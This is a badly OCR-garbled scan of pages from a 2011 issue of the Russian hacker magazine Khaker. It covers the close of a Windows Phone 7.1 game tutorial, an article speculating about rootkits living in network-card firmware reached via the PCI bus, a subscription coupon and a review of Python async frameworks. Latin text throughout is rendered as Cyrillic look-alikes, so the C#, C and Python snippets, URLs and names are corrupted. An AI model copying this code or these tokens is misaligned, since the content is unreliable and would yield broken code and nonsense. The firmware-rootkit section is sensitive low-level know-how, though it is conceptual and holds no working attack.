Напоследок добавим звук. Возьми какой-нибудь *.м/ау-файл (напри- 
мер, с диска] и загрузи его в контент пайплайн. Объяви три перемен- 
ных: одну для загрузки звука, вторую — для осуществления контрола 
над проигрыванием, и последнюю — для состояния проигрывания: 


ЗоипаЕ+4ес* зоипа; //звук 
5оцпаЕКес*Тпапсе зоипаСоп{го1; //управление звуком 
Боо1 1$Р1ау = Ра15е; //индикатор проигрывания музыки 


Затем в функции ГоаЯСощег{ загрузи звук, создай объект для управ- 
ления загруженным звуком, зацикли его воспроизведение и начни 
проигрывать: 


оипа= Сопфеп*. [оа4<ЗоипаЕ+ес* > ("Ми$1с/3еф5014"); 
$оипаСоп{го1 = зоипа.СгеаеТп$Фапсе(); 

5оцпаСоп*го1 .Т$Ёоореа = гие; 

5оипаСоп*го1.Р1ау(); 

15Р]ау = %гие; 


Теперь в функцию Урда{епри{ добавь код для остановки и воспроиз- 
ведения музыки по нажатию на кнопку Васк эмулятора: 


1+ (батеРаа .беф$афе(Р1ауегТпаех.Опе).ВиЕФоп$.Васк == 

ВиЕфоп5фае.Ргез5еа) { 

1+ (15РТау) { 
зоипаСоп*го1 .Раи$е(); 
15Р]ау = Ра15е; 

} е1 зе { 
зоипаСоп*го1 .Р1ау(); 
15Р]ау = %гие; 


После этого можешь протестировать свой экземпляр. Теперь должна 
проигрываться выбранная мелодия. Да, подготовленный мной звук, 
конечно, вообще не втему, зато бесплатно :]! 


Итоги 


В процессе написания статьи я постарался рассказать тебе об 
основах программирования для \/\/Р 7.1 и, главным образом, о 
создании приложений с динамической трехмерной графикой. Не 
рассмотренными остались многие примечательные механизмы, 
присущие этой платформе: взаимодействие с разными датчиками, 
сервисами и другими аппаратными средствами. При этомя не ста- 
вил перед собой такой цели, я лишь хотел сделать вводный туториал 
о возможностях программирования игр для \\/п9о\м/$ РПопе 7.1. К 
сожалению, рамки статьи не позволили мне рассказать о разработ- 
ке полностью законченной игры, протестировать ее на реальном 
устройстве (ктому же, в период написания статьи устройства с 
\\/Р7.1 еще не существовало в природе :]} ивыложить ее на \//п9о\$ 
РВопе Магке{р(асе (отмечу, что за право торговать в магазине надо 
приобрести лицензию на годза 2900 рублей). Однако я уже работаю 
над этой игрой, и в следующий раз постараюсь детально описать ее 
разработку, чтобы утебя был неисчерпаемый багаж знаний! 

Удачи в выводе денег — ведь пользователи \\Лп4о\м/$ РВопе привыкли 
платить за полезные и качественные приложения! 5= 
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Фантазии системного программиста 
о создании непобедимого руткита 


© Представь себе фантасмагорию: твоя сетевая карта 

(или процессор, или видеокарта) живет отдельной жизнью 
шизофреника. И дружит она (или все эти компьютерные потроха 
сразу) против тебя. Возможно ли такое восстание машин, 
инициированное силами хакеров или, скажем, производителей 
железа? Давай пофантазируем! 
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на портах 
ЕГегпе! 


сос 


Так схематично проходит процесс обработки сетевых пакетов на уровне МС <===> РС 


Начнем стого, что любой сетевой пакет, пришедший 
из недр сети, прежде чем дойти дотвоего браузера или _ 
другого сетевого приложения, в первую очередь будет 
обработан твоей сетевой картой, а затем — непосред- 
ственно ядром операционной системы. А вдруг этот 
самый пакет будетнести вместе с собой некие инструк- 
ции, которые тут же подчинят себе всю машину? Ведь для 
этого не нужно писать эксплоиты, искать уязвимости, для 
того чтобы внедрить зловредный код... Просто... отправь 
пакет на какой-либо открытый порт. И — все... Ты уже не 
хозяин своему компьютеру. И плакали крокодильими 
слезами разработчики антйвирусных программ и систем 
проактивной защиты - помочь они ничем не смогут. 


Поехали! 


Скажу только одно — есть в сети примеры (внимание!) веб 
и 55Н-серверов, базирующихся на ресурсах одной лишь 
сетевой или графической карты. Да-да, использующих 
ресурсы (микропроцессор и оперативную память] этих 
самых карт [ргоо пк: а(сВегпп!>{ом. ога/аг“до/Рарегз/ 
Агг о- та! -РАСЗ 08- Ргоес!- Иаих-||. 091, атакже 
гаФогаЧаг пе Имеми 
Вип. 

Если ты до сих пор не понял, о чем речь, повторю: не нуж- 
на операционная система, не нужно ядро, все что нуж- 

но - это микропроцессор сетевой карты, который будет 
обрабатывать приходящие пакеты из сети и что-то там 
отсылать обратно. Представь себе мини-Араспе, который 
реализован вне контроля ядра за самой машиной, ведь 
сетевая карта, как железка, висит где-то на РС!-шинеи 
ей подвластно все ядро операционки 

Страшно, но это еще цветочки, мой дорогой друг. Главное — 
уяснитьто, что разработчики отдельных важных железок в 
твоем компьютере, будьто сетевая плата или видеокарта, в 
глубоком секрете держат все скрытые возможности своих 
разработок. Просто вспомни, чтотакое недокументирован- 
ные возможности операционной системы. Или процессо- 
ра. Или еще какой-нибудь железки, полные возможности 
которой хранятся в глубокой тайне отнас, программистов. 


Лезем внедра 


Атеперь представь себе руткит, который живетне 
в операционной системе, а, скажем, втой же самой 


Цесёгогись пе\5/амг_ сгипл6 644 пе. 


ХАКЕР 09 /152/ 2011 


МАС Моск 


Драйвер МС 
(минипорт) 


Обмен сетевы- 
ми фреймами 


2 тв 
ше 
а з 
. 


АА ы 


в ма Е 


* сетевой карточке. Хотя такое реализовать под силулишь | 


разработчикам самого железа, мы попробуем поставить 
`себя на их место и посмотреть „возможно ли полностью 
контролировать железо втвоем компьютере или нет? 
Сегодня мы попытаемся рассмотреть эту интересную 
тему сточки зрения системного программиста. Мы 
попробуем ответить на вопрос, как «глубока кроличья 
нора», как глубоко можно залезть в недра операционной 
системы. Бороться с руткитами, живущими в Иггпумаге 
железяк твоего компьютера, наверное, все-таки бес- 
смысленно. Однако ковыряние во внутренностях ядра 
и железа, какты сейчас увидишь, откроет перед тобой, 
много всяких интересных подробностей. | 
Обычный перехват сетевого трафика в современных 
файрволах сводится кустановкам 10|-МО5-фильтров 
и перехвате важных М0|$-функций, таких, как, скажем, 
№15Кед!${егРготосо(. Есть два подхода К перехвату 
сетевого трафика. Первое — это установить, скажем, ГО|- 
фильтр или №015 |М-драйвер и жить себе спокойно. Но 
этот подход не защитит минипорт сетевой карты, который 
является своеобразным форпостом, ибо дальше — ресур- 
сы сетевой карты и сеть.” 
Перехват ключевых функций в структуре МО _ 
МИМ!РОКТ_ВЕОСК может гарантировать твоей зверюш- 
ке уверенный контроль или модификацию сетевого 
трафика, если бы не одно«но» — заполучить указатель на 
№01$_МИМРОКТ_ВЕОСК ой как непросто! Один из самых 
распространенных способов получить указательна ми- 
нипорт — регистрировать свой сетевой протокол вядре 
вызовом М№а15Кед!${егРготосо(, но файрволу достаточно 
перехватить эту функцию, чтобы обломать все попытки 
это сделать. 
Какже быть? 
Казалось бы, способов контроля сети современному 
руткиту остается немного, однако в данной ситуации мало 
кто вспоминает о таком волшебном слове, как РС1. Ведь 
сетевая карта «сидит» на РС|-шине, взаимодействует 
(читай «передает данные») с ядром операционной систе- 
мы именно посредством тех ресурсов, которые Р(|-шина 
ей выделяет 
Сетевая карта [физически] состоит из двух блоков — РНУ- 
блоки МАС-блок. Первый отвечает за непосредственное 
«переваривание» сигналов с К.]45-кабеля в набор байт, 


е ты найдешь 
зачетных книг 
фо а. по- 
ценных описанию 
терфейса, 

е настоятельно 


ее коменную к про- 


чтению, а также код, 
позволяющий легко 
Тросканировать РС!- 
Шин) 
все устройства, 
«висящие» на шине, 
в том.числе регион 
памяти, который вы- 
делен устройству. 


[НТТР://ММИМ 


р ИпК5 
Рекомендую к по- 


сещению — 
а(спег! ом. ога/ 


аггдо/лпдех.В\гп(, 


сайт Аггдо Ти, 
там есть немало вкус- 
ностей на тему нагиба 
всяких операционных 
систем. 
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айти и описать. 


й 


СООМС 
`@_ е] 


И 
ередаются в МАС-блок. Этот 
менно он непосредственно от- 


которые для Дальнейшей обр 


блок гораздо интереснее, потому что 


вечает за взаимодействие с драйвером сетевой карты ЯЯинипортом). 


Он обладаетодним или двумя СРУ, ЕЕРКОМ-памятью, собственной _ 
5КАМ-памятью и набором регистров, посредством которых управля- 
ется «устройство» сетевой карты. В ЕЕРКОМ, какправило, содержит- 
ся информация о производителе, МАС-адрес сетевой карты, образ 
прошивки. Структура каждого конкретного ЕЕРКОМ имеетнедоку- 
ментированный формат и зависитлишьот фантазии разработчиков 
самой сетевой карты. СВАМ-память содержит копию прошивки 
Нггпмиаге, структуры сетевых пакетов, а также временные буферы 

для хранения приходящих/уходящих сетевых пакетов. Регистры, в 
свою очередь, позволяют полностью контролировать сетевую карту и 
управлятьею. Сколько их, и для чего они служат в каждом конкретном 
случае — также зависитот фантазии разработчика, поэтому зачастую 
часть изних имеет недокументированный формат. 

Главный вопрос статьи — можно ли получить доступ к ЕЕРРОМ, 
ЪКАМ или регистрам? Ответ — да, можно. И сделаем мы это через 
РС!-интерфейс. 

РС! -шина поддерживает метод передачи данных, называемый «Ипеаг 
Биг$%> [метод линейных пакетов). Этот метод предполагает, что пакет 
информации считывается (или записывается] «одним куском», то 

есть адрес автоматически увеличивается для следующего'байта. 
Естественным образом при этом увеличивается скорость передачи 
собственно данных за счетуменьшения числа передаваемых адресов. 
Шина РС! является той черепахой, на которой стоят слоны, поддер- 
живающие «Землю» — архитектуру Ршд апа Р!зу (РпР). 
Спецификация шины РС! определяеттри типа ресурсов: два 
обычных [«диапазон памяти» и «диапазон ввода/вывода», как ИХ 
называет компания М!сгозоН) и сопЙдигаНоп зрасе — «конфигура- 
ционное пространство». 

Более подробно о шине РС! ты сможешь прочесть в замечательной 
книге «РС! Ви$ ОетузИЙеад» оттоварища Оочд АББо(, ееты сможешь 
найти на диске кжурналу, 

Именно РС|-шина, благодаря своим «фундаментальным» особен- 
ностям, позволит нам получить доступ ко всем ресурсам не только 
сетевой карты, но и любого другого устройства, которое сидитна 

РО! -шине. И при этом мы, находясь втрезвом уме и не совсемтрез- 
вой памяти :], не задевая такие уровни сетевой инфраструктуры, как 
ТЫ! или М5, где сидят сторожа файрволов, сразу залезем в глотку 
сетевой карте. И никто нам в этом не помешает: все, что нужно будет 
сделать — засандалить драйвер в систему. 

Операционная система для взаимодействия сустройствами на РС|- 
шине задействует механизм ввода-вывода, основанный на проекции 
участков памяти (тетогу-парред /О). 

Такой участок памяти, как правило, имеет размер в 64 килобайта. 
Первые 32 килобайта использованы для проекции регистров устрой- 
ства, вторые 32 килобайта представляют собой «окно» с возмож- 
ностями чтения/записи в 5КАМ-память сетевой карты. Всего этого 
вполне хватит, чтобы получить контроль над любым изустройств, 
присутствующих на РС|-шине. 


Перечислим все устройства наРС!-шине 
Фог (БизМитбег = 9; !адарфегРоипа && тогеВизез; БизМитЬег++) 
{ 
Фог (аем1семитЬег = 9; 
| ааар*егРоипа && де\у1сеМмитЬег < РСТ_МАХ_ОЕ\МТСЕ$; 
де\1семитЬег++) { 
$10%{Митбег.и. 61$ .Кезегуеа = 0; 
$10{Митбег.и. 615 .Беу1семитбег = деу1сеМмитбег; 
$10%Митбег.и.61$.ЕипсЕ1опМитЬег = 0; 


1епёЕИ = На1бееВизБафа(РСТСопявига*1оп, 
БиМитбег, 
510%{Митбег.и.АзИЕОМС, 
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сопй=Тито, 


512е0+(РСТ_СОММОМ_СОМЕТС) ); 
} 
} 
| | : ь. 
Осталасьса! лая малость — разобраться, ВСМ ыСЛ + [@) греверсить 


РЕРКОМ сетевой карты, потому что внашем слу‘ ЕРВОМ — это все. 
Г ЕЕ: в < 

Что тут надо иметь ввиду? Во-первых, ЕЕРКОМ ержит в себе 

поп-уо[аЩе-данные. Во-вторых, э и данные доступны для чтения и 


записи через набор регистров се 
помнить, что форматЕЕРКОМ пра 
лей сетевых картне документируе 
содержит в себе, как правило, за 
«устройства» сетевой карты, дан 


евой карты. Нуи в-третьих, надо 
ктически никем, з производите- 
ся. Что мы Ни ЕЕРКОМ? Он 
ловок загрузчи ка, метаданные 
ыео конфигурации сетевой карты, 
такие как МАС-адрес, и самое главное — набор Игтп\м/аге-имиджей, 
то есть: код загрузчика} дефолтный имидж, РХЕ [Ргебос{ еХеси оп 
Епмгопгпеп\, хрень для возможности «загрузки компьютера с ис- 
пользованием сетевото интерфейса»] и много всего прочего. 
Теперь надо ответить на воп рос, как имидж {гипм/аге загружается из 
ЕЕРКОМ в память? Очень просто — надо перегрузить сетевую карту 
и остановить процессор как можно скорее! Разумеется, делать это 
надо с использованием ПО, поддерживающего эмуляцию физи- 
ческих устройств :]. Что в результате? В результате можно увидеть, 
„что каждый раз, когда И подключение сетевой карты (или 
перезагрузка РС!-шины): 1 


Нггомуаге [простите за тавтологию} из ЕЕРКОМ. _ 
6. Выполняет код загрузчика Ягплумаге, то есть конфигурируетядро сете- 
вой карты, настраивая часы, потребление энергии и прочее; после чего 
загружает на исполнение «вторую очередь» Иггп\ми р ртерая является 
дефолтным основным имиджем сетевой карты; О астофьвет 
все остальное — МАС-адрес и прочие особенности с 
Вот, в принципе, и все, что нужно знать и процесе агрузки имиджа 

сетевой карты. И наконец, отвечу на вопрос, ко’ орый, наверное, дав- 
но вертится утебя в голове: можно ли сдерАыиякой руткит, который 


етевой карточки. 


сможет заразить сетевую или графическую карту? Ответ прост: да, 
что такой руткит будет весьма опасным и живучим, с 

лишь на конкретной марке сетевой карты отодното Г роизводителя.. 
Для разработки такого руткита нужно сдампить Яггамаге, отре- 
версить его, разобраться в принципах работы регистров... Азатем 


это можьосделать,_ хотя и очень-очень нейросто. Несмотря на.то, 
Н | 


написать свое собственное Нггпмуаге, которое и будет заменено _ 
на оригинальное. Сделать это крайне сложно, хотя и возможно. В , 
сети, если хорошенько поискать, можно найти реальные примеры 
программулек, которые могут заставить сетевую карту жить двойной 
жизнью. Однако, повторюсь, это всего лишь РоС, который привязан к 
конкретной модели сетевой карты. _ 

А что насчет контроля за сетевыми картами без варианта инсталляции 
руткита? Ненамного проще! Универсального способа, который бы 
позволил нагнуть все сетевые карты разом, не существует. Производи- 
телей множество, и запилить программу, которая будет контролировать 
все сетевые карты подряд, невозможно. Для этого, какты уже понял, 
нужно знать конкретные особенности конкретной сетевой карты — 
ведь сколько разработчиков, столько и разных форматов ЕЕРКОМ, 
регистров, ну и, разумеется, Нгглумаге. Нужно хорошо разбираться в 


принципах действия шины РС! и самой операционной системы. 


Вместо заключения 


Согласен: выбирать путь заражения или контроля за РС!-Базед- 
устройствами таким вот способом — удел немногих извращенцев. 
Нет, я отнюдь не призываю тебя присоединяться к извращенцам, од- 
нако системный кодинг в этом направлении поможеттебе понять, как 
работает система на уровне аппаратного железа. Поверь, это крайне 
увлекательное занятие :}. Удачного компилирования, и да пребудетс 
тобой Сила! = 
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1. Разборчиво заполни подписной купон и | 7 НОМ РОВ — 2700 РУБ 
квитанцию, вырезав их из журнала, сделав : 
ксерокопию или распечатав с сайта 

6 НОМЕРОВ — 1260 ру. 


РИ 2. Оплати подписку через любой банк. 


3. те ни — И СТОЯТЕЬНО ПОЛУЧИТЬ ЖУРНАЛ 


любым из нижеперечисленных способов: 


® на е-тац: — 
* по факсу: [495] 545-09-06; Е ЛЕНТ 


® почтой по адресу: 115280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 
5 эт., офис № 21, 

000 «Гейм Лэнд», отдел подписки. 


1 Ри. 
И 
| 


ЗА 12 МЕСЯЦЕВ 
Внимание! Если произвести оплату в сентяб- ЗА б МЕСЯЦЕВ 


ре, то подписку можно оформить с ноября. 


Единая цена по всей России. Доставка ЕСТЬ ВОПРОСЫ? Пиши на 'пто@а(с.ги или звони по бесплатным 

за счет издателя, в том числе курьером телефонам 8[495]663-82-77 р москвичей) и 8 (800) 200-3- 

по Москве в пределах МКАД 999 [для жителей других регионов России, абонентов сетей 
МТС, БиЛайн и Мегафон). 


ПОДПИСНОЙ КУПОН 


ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 


[] на 6 месяцев 


С на12 месяцев Извещение ИНН 7729410015 ООО «Гейм Лэнд» 
и ы ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 
Ш Доставлять журнал по почте к/с № 30101810900000000990 
на домашний адрес 
БИК 044583990 КПП 770401001 
Доставлять журнал курьером: 
[] на адрес офиса* Плательщик 
[] на домашний адрес* * Адрес (с индексом) 
(отметь квадрат выбранного варианта подписки) 
Назначение платежа Сумма 
ФИО Оплата журнала « 
с 
Ф.И.О. 
Кассир 


Подпись плательщика 
АДРЕС ДОСТАВКИ: 
индекс 
областыкрай 
город, 
улица 
ом корпус 
квартира/офис 
телефон ( ) 


код 


ИНН 7729410015 ООО «Гейм Лэнд» 


Квитанция 
ОАО «Нордеа Банк», г. Москва 


р/с № 40702810509000132297 

к/с № 30101810900000000990 

БИК 044583990 КПП 770401001 
Плательщик 


, Адрес (с индексом) 
е-тай 


сумма оплаты 


*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 


Назначение платежа Сумма 


Оплата журнала « 


с 
Ф.И.О. 
Кассир Подпись плательщика 


Ш М Ддиль Хаштамов [а9Ц.КВазА{атоу@дта . сот, ИИр://КВазН+атоу.К2) 


ВЕБ ПО-АСИНХРОННОМУ 


Обзор асинхронных фреймворков для РУПоп 


© Асинхронный фреймворк — это ключ к тому, чтобы твое крутое 
веб-приложение могло обрабатывать сразу тысячи одновременно 
висящих клиентов даже на средненьком дедике. Звучит 
фантастично? Поверь мне, это правда! 


Что за зверь? 


Прежде чем окунуться в омутфреймворков, я хочу поведать отом, что же 
на самом деле такое «асинхронность». 

Современные методы программирования в большинстве своем 
базируются натак называемом синхронном стиле [выполнении кода 
построчно, шагза шагом, линейно). Для более ясного понимания пред- 
ставим веб-сервер, который получает запрос от клиента, и пока сервер 
обрабатываетодин запрос, другие клиенты должны будут ждать конца 
выполнения, и только после этого до них дойдеточередь. Согласись, это 
далеко не самый эффективный способ. Еслиты втеме, то можешь воз- 
разить мне и сказать, что человечество давно уже придумало потоки. Но 
в потоках скрывается куда больше проблем, чем они способны решить. 
Представь себе 10 тысяч одновременных соединений, и следовательно 
1Отысяч потоков. Создание огромного количества потоков просто- 
напросто поглотит всю оперативную память компьютера, не говоря уже о 
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быстродействии процессора между переключением контекста — налицо 
явная ОО5$-атака. Наиболее эффективное решение обработки тысячи 
одновременных соединений — это, несомненно, асинхронные сокеты. 
Асинхронный стиль, он же неблокирующий, часто называют событийно- 
ориентированным. Представим себе код: 


5 = осКеф.зоскет(...) 

5. 5е61осК1пв ( Т5ВЕОСКТМС) 
5 .соппесе( (По$+ ‚рогт)) 
Дафа = .гес\у(1024.) 

# какой-то другой код 
5.С105е() 


В коде видно, что пока данные с сокета не будут получены, следующий 
за ним код не будет исполнен. Асинхронный же код после запроса 
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Ю = бо нелеьвынны вралы 


- - 


®> Глчеа Мах [а6$ 


*- ыы. ПБ 


Рае ие Тиле? 


ЕАН. 


О О м | С а О 
тт Гры сле а Ьа И 


мт М 


ВАННЫ 1 ПОРРАЬ ГЫ, 


= бааыый - СНГ Е 


вача 


Е о Не И: об ЕВ 


Тоизвеа тео еее мели вора ТСР, БР, СОТ. иене, ими зеФонек, 2 Бе аеафие" © 
ргобосом [иска ЫТТР, ЮЫТР:, ЦАР, СЫ, Е, РТР, гы от], дек тож, пог 


# Гестия Вкл + Гирп НЯ оц гыеф а БГ 0 бе Ре 9 
Е т Е ИН 
„ТЦ = РОБ Фе ПЕН: Гы Быки ПАЙ 

= Тезеае 2 Пер в МЕ ФР ИРАНЕ ь Гереоее |Реролузеия 6 гие] 
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Серьезность сайта мм$е4 говорит о серьезности фреймворка 


ТЕМАТИЧЕСКИЕ ССЫЛКИ 


® [огпаЧо\/еб.ога — официальный сайт фреймворка Тогпадо. 
® м${едтайх.согт — сетевой асинхронный швейцарский нож 


ммеед. 

® дипгсогп.ога — \/5С! РУВоп-сервера. 

® де\еп{.огд — сетевая библиотека, основанная на библиотеке (Беу- 
ЕЕ 

® ПСПО. аз — азупсВгопочц$-егуегз-шп-ру{Поп-тест на 
производительность сетевых неблокирующих фреймворков на 
РУГоп. 


® русоп.БИр.&/ — видео с конференции РуСоп. 


данных не ждет ответа, а сразу передаетуправление дальше, поэтому, 
кактолько сервер соизволит ответить, мы об этом узнаем и как следует 
обработаем его ответ. То есть, концепция асинхронного программи- 
рования заключается втом, что ты пишешь код, который реагирует на 
определенные события — например, когда клиент подключен/отклю- 
чен/готов к приему сообщений итак далее. Неблокирующий сетевой 
ввод-вывод в разных операционных системах реализуется по-разному. 
Например, в МИп4ом/$ это зе(ес{), в Чпихеро{), роЦ{}, аво ЕгееВ5О 

это Кацеце(). Помнится мне, что в одном из старых выпусков журнала [ 
многоуважаемый Михаил Флёнов, онже Вот! с, рассказывал отом, как 
написать самый быстрый в мире сканер портов. Очень советую отыскать 
тебе эту статью и как следует понять описанные в ней механизмы (хакер. 
ги/ппада7е/ха/042/058/1.азр — какже давно это было... — прим. ред.). 
Именно эти механизмы позволяют нам обрабатыватьтысячи одновре- 
менно открытых сокетов в рамках одного процесса, а, следовательно, и 
одного главного потока. Но стоит отметить, что такой подход скрываетв 
себе и подводные камни, о которыхя расскажу в конце статьи. А сейчас 
приступим непосредственно кобзору инструментария. 


Зверинец фреймворков 


Куда же без их, родимых? Для РУПоп-программистов на интернет- 
рынке существует огромное количество интересных фреймворков — как 
асинхронных, таки синхронных. Из последних, пожалуй, стоит выделить 
всеми известный и попсовый фреймворк О/аподо, о котором [писал не 
так давно. Но сегодня речь неонем (точнее, нетолько о нем). Итак, что 
жеунасесть на сегодняшний день? 
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Топадо 


Стоит отметить, чтоу данного фреймворка весьма интересная история. 
Изначально он писался для внутреннего использования сервисом 
ЕнепаГееч. Позже, когда сервис был выкуплен в 2009 году социальной 
сетью Гасебоок, ребята решили выложить исходныетексты этого заме- 
чательного инструмента. На текущий момент Тогпадо имеетнебольшое, 
но дружное сообщество разработчиков и пользователей, которые 
активно обсуждаюти поддерживаютлюбимый фреймворк. Доказатель- 
ством моих слов служит недавний стабильный релиз второй версии 
Тогпадо. Пожалуй, одним из значительных минусов этого неблокирую- 
щего аппарата является отсутствие внятной документации, отсюда ине 
столь его большая популярность по сравнению с Папдо, где докумен- 
тация просто сказочная. Но для настоящего питониста это не должно 
быть преградой, ибо мы неищем легких путей! Тем более, что читать 
исходный код Тогпадо очень приятно — он красиво и корректно написан. 
А совмещать приятное с полезным вдвойне приятно, тем более, что кода 
совсем немного. Кстати, если ты работал с микрофреймворком меБ.ру, 
то Тогпадо покажется очень знакомым, в нем сочетаются те же самые 
простота и эффективность :] — за примерами можно обратиться кпапке 
егтпо$ в архиве фреймворка, благо, ихтам достаточно. 

Такчто жеунего внутри? Чем онтак привлекает немалое количество 
профессионалов среди веб-разработчиков?? Тогпадо по праву можно на- 
звать полноценным веб-инструментом. В нем отлично поддерживается 
парадигма МУС (тоде(-лем/-согигоЦег), обращает на себя внимание 
весьма серьезный по скорости встроенный шаблонизатор схорошим 
синтаксисом шаблонов, похожим на синтаксис шаблонов [\апдо. 
Приятным плюсом для меня был и набор модулей для авторизации на 
популярных социальных сервисахтипа Тми [ег ГасеБоок, боод(е — сей- 
час очень модно лепитьтакие фишки на сайтах, дабы не посылать юзера 
через дебри этапов регистрации. Благо нынчеу каждого компьютеризи- 
рованного человека есть хотя бы один аккаунт в этих сетях. Относитель- 
но работы с базой данных разработчики проявили некоторый агности- 
цизм и по умолчанию поддерживают работу только с МУЗСЕ, которая 
всецело построена вблокирующем стиле, поэтому практически все 
плюшки асинхронной работы Тогпадо исчезают, если ты пишешь веб- 
приложение, которое взаимодействует с Му5О[-базой, хотя попытки 
написания стабильного асинхронного драйвера продолжаются. Из этой 
ситуации есть выход — использовать Ро$дгеб@(, который явно быстрее 
МуОЕ и в последних релизах поддерживает асинхронную обработку 
запросов. 
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Сша Рак. БЫ аш 


5 ры Мета ву 


В ча 
База интересных сниппетов от сообщества Тогпадо 


Простейший НеЦо мог в Тогпадо выглядиттак: 


НеЦо мог4 на Тогпадо 
1троге фогпаао.1о1оор 
1троге фогпадо .меБ 


с1а$$ Ма1пНапаТег (Фогпадо .меб.Кедие{Напа1ег): 
де+ вет (5е1+): 
5е1+.мг1{е ("Не11о, мог1а") 


арр11са1оп = огпадо .меб.Арр11са*1оп([ 
в: 
1) 


Ма1пНапа1 ег), 


1+ __ пате__ == "__ма1пт__": 
арр11са{1оп.11$5%еп(8888) 


Тогпадо.101оор.ТОЁоор.1п$5Фапсе().$Фаг*() 


Запускать данный скрипт можно прямо в консоли — Тогпадо действи- 
тельно многое унаследовал отмиеБ.ру в плане простоты. В его поставку 
входит весьма неплохой ПЕр-сервер, который лучше всего запускать 
за гоп{-епд9-сервером вроде пдгпх, для более стабильной и эффектив- 
ной работы твоего веб-приложения. Для более детального ознаком- 
ления сего спецификациями советую сходить на официальный сайт 
фреймворка. 

Плюсы: 

1. Достаточно низкий порог входа, что дает значительное преимущество 
перед остальными фреймворками. 

2. Весьма легкий для чтения и понимания код, нет практически ничего 
лишнего. 

3.Внушительно быстрая обработка тысяч одновременно открытых 
соединений. За конкретными тестами милости прошу влинки, указан- 
ные мной во врезке. 

Минусы: 

1. Отсутствие внятной документации. 

2. Тогпадо беден на сторонние библиотеки, хотя это вопрос времени. 


Ммяеа 


Пожалуй, Гмл${е4 по праву можно назвать «швейцарским ножом» для 
любого сетевого программиста на Ру{Поп. Это настолько огромный 
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монстр свнушительным функционалом, что о большем и мечтать нельзя. 
Онподдерживает работу с целым зоопарком протоколов: ТСР/ЦОР, 5$1/ 
ТЕ $, НТТР, $$Н, ЕТР, КС, ММТР, ХМРР иеще кучей всего остального. 

Из плюсов ГМм$е4 стоит выделить весьма богатую библиотеку, атакже 
внятную и обширную документацию с практическими примерами. Чисто 
с моейточки зрения, Тмм${е4 — это целая платформа, изучение которой 
требует немало времени и практики, но онотого стоит, еслитытак или 
иначе вовлечен вудивительный мир сетевого кодинга. Кстати, о Гм$еа 
написана не одна книга, что лишний раз подтверждает серьезность 
фреймворка. Обратной стороной медали являетсятот факт, что любая 
большая система чаше всего является сложной. Увы, [мл$е4 — не ис- 
ключение. Помимо сложности изучения, Тми$еа4 значительноусту- 

пает по скорости обработки соединений вышеупомянутому Тогпадо. 

О многочисленныхтестах, которые проводились между различными 
неблокирующими фреймворками Руоп, ты можешьузнать излинков в 
конце статьи. Также стоит отметить, что разрабатывать веб-приложение 
на Гул$еа, как в плане написания, так и в плане развертывания, на 
порядок сложнее, чем в Тогпадо. Тил${е4 нетак просто (по сравнению с 
Тогпадо илитем же О}апдо) интегрировать с базой данных — в его кон- 
курентах львиную долю работы на себя беретфреймворк — даже вчасти 
создания таблиц и формирования $( | -запросов. 

Плюсы: 

1. Очень богатая библиотека. 

2. Отличная документация. 

Минусы: 

1. Судя потестам, является далеко не лидером в быстродействии. 

2. Достаточно высокий порог вхождения. 


Сипюсот + Сеует 


Об этой связке, пожалуй, знаютнетак много Ру{Поп меБ-разработчиков, 
поэтому я решил осветить ее подробнее. Впервые об этом альянсе 
яуслышал на конференции РуСоп, которая проходила в этом году в 
Атланте. Суть заключается в объединении супербыстрого \\/5С|-сервера 
Сиггсогп с сетевой библиотекой нового поколения беуег\ [онатакже 
включает в себя встроенный \/5С|-сервер на основе Беуеп{. Если быть 
максимально кратким, то сетевая библиотека Сеуеп{ даетнам возмож- 
ность писать асинхронный код в синхронном стиле, что, несомненно, 
является весомым плюсом по части трудозатрат. бемеп{ используеттак 
называемые «гринлеты» («микропотоки»] чаще всего внутри главного 
потока, поэтому неудивительно, что разработчик библиотеки в качестве 


ХАКЕР 09 /152/ 2011 


Зам Пика Гео вый НЫМ Нилемы Пыдеене мыли 


Галь О водный 
О 


ТЕ течЕ срать о ото еы бырресЕя Ба ва Пао с цю Ни О 
м О т МСТ 


с МТ т т и И м ма мт 


выс 2 ти оба рес иы Фок тои, ак ЕВ Сык 2 Бали 
О С В а т Е М 


вы ва ыы 


иене шанс 
ВБ Еи валят 
Верес и’ри 
Пре к И 9 Бра 


нес о 
Е] Урны всех КаеыгЕ ЕБЕТ, ТТЫРрехриЕеУ , Ни, ООН. т 
| ЕНОТесйа, ЕВНЫТЬсЯЙИ, ЕЗЫТИ, ЕАСИ. ЕВАБР, бов АвОРТЕР, вееееее 


| ву 

т СТ 

1] вееечеы в Пн СЕНЕ 1 
| вонвЕк вар = {] 


3 ЧЕ ирина Еее 
| =. Еее 
Е пати са, ака асгй 
Е иысерт ГРы1ыЕЕЕсаЕ, еее раыЕсеае. Мывайееаер и 
ы Е атЕ пл есроссо 


Им. икгОя сея фе] 
кибм "Бпкооты иттес 10” Факе 


Е а Е 
рае 


ЕСГ г 


ига аЕ т Ч Ежитаны Качтььь а -] вены: - рии ы к. 


= 
Ув У ЕЯ реет ГУТ и те а | ИС: 


Е И Г О т м ТГ С Тат ТЕ 


иоер Ен, ирисы ве Рокс, 1 1 пы выс иаре анонс то Пос Е ыы гы 
С р мм м. 


12 © 8 | @ 


Читабельный < О В, 


«планировщика» для этих самых «гринлетов» выбрал давноуже из- 
вестную библиотеку ИБеуеп: [используется в СВгоплипл, гегпсасве4), 
которая ктому же написана на чистом Си, что несомненно сказывается 
на скорости работы. Но, насколько мне известно из официального блога, 
в планируемой версии Сбеуеп{ собираются использоватьуже ставшую 
стабильной и быстрой ЦБе\у, лишенную тех ошибок, что присущи ИБеуегт. 
Практически вся стандартная сетевая библиотека питона написана в 
блокирующем стиле, будьто игШЬ, КрИБ или что-то еще. Логично, что 
обычным образом нам бы не удалось заставить их работать в асинхрон- 
ном режиме, если бы не специальный патчинг сокетов, который делает 
Се\уеп+. Вот, кстати, тебе пример работы с Се\уеп(: 


Параллельная загрузка сайтов в беуег{ 
иг1$ = [ "Ир: //ммм. 20051е.сот', 'ПЁр: //ммм.уапаех.ги', 


"Бер: / /ммм. ру{Поп.оге' ] 


1троге вемепе 
{гот веуеп* 1трог® топкеу 
топкеу.рафсй_а11() 


1троге иг11162 


